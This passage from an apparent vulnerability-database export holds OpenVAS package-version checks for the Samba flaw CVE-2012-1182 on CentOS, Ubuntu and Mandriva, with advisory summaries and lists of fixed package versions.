See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881650\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:01 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0506\");\n script_name(\"CentOS Update for samba4 CESA-2013:0506 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"samba4 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, 
used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, 'Samba4\n Package Support' in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or\n 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool\n failed. 
This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named 'samba4' to avoid conflicts during the\n upgrade.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "description": "Ubuntu Update for samba USN-1423-1", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "openvas", "title": "Ubuntu Update for samba USN-1423-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# 
Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840980\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\");\n 
script_tag(name:\"affected\", value:\"samba on Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. (CVE-2012-1182)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:30", "description": "The remote host is missing an update for the 'evolution-mapi' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for 
evolution-mapi CESA-2013:0515 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019320.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881654\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:29 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0515\");\n script_name(\"CentOS Update 
for evolution-mapi CESA-2013:0515 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'evolution-mapi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"evolution-mapi on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. 
This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831574", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831574", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 
Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831574\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", 
re:\"ssh/login/release=MNDK_(2011\\.0|mes5\\.2|2010\\.1)\");\n script_tag(name:\"affected\", value:\"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", 
rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n 